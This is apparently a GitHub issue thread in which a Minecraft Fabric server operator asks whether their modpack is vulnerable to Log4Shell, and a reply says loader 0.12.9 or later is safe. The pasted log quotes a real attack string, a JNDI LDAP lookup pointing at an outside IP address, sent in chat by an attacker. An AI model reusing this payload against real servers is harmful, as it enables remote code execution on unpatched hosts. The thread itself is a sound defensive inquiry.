log4j?
cocus opened this issue ยท 3 comments
Hi!
I've been bombarded with some users (namely FermatSleep, which seems to be "rafael") on my Windows 10 server.
I didn't see anything unusual except for:
[10:00:07] [Server thread/INFO]: FermatSleep[/195.154.52.77:56322] logged in with entity id 15317 at (-0.5, 72.0, 972.5)
[10:00:07] [Server thread/WARN]: Player class_3222['FermatSleep'/15317, l='ServerLevel[world]', x=-0.50, y=72.00, z=972.50] could not be synced because server networking isn't set up yet.
[10:00:07] [Server thread/INFO]: FermatSleep joined the game
[10:00:09] [Server thread/INFO]: <FermatSleep> ${jndi:ldap://195.154.52.77:1389/a}
[10:00:09] [Server thread/INFO]: FermatSleep lost connection: Disconnected
[10:00:09] [Server thread/INFO]: FermatSleep left the game
But all the other users on reddit are reporting the same thing and the same IPs. By the looks of it, the **shole only targeted Linux servers...
The thing is, is AOF4 affected? or any of the fabric server jars or anything? I didn't see any log4j jars but that doesn't mean there's none.
I tried the ldap log4js tests by commenting on my own account while connected to the server, but... Nothing showed up. Not even if I ran ldapsearch on those urls provided by some tools. So I wanted to know more.
Do I need to take some measures? (I've already blocked his IP address tho!)
Thanks
If you had Fabric loader 0.12.9 or later, you should be fine. You likely have this loader version already if you use All of Fabric 4 versions 1.1.2 or 1.1.3.
I'm using 1.1.3, and the previous version I had was 0.09 which I promptly updated on the 14th of december of 2021.
However these messages appeared yesterday and took me by surprise.
Thanks for the confirmation
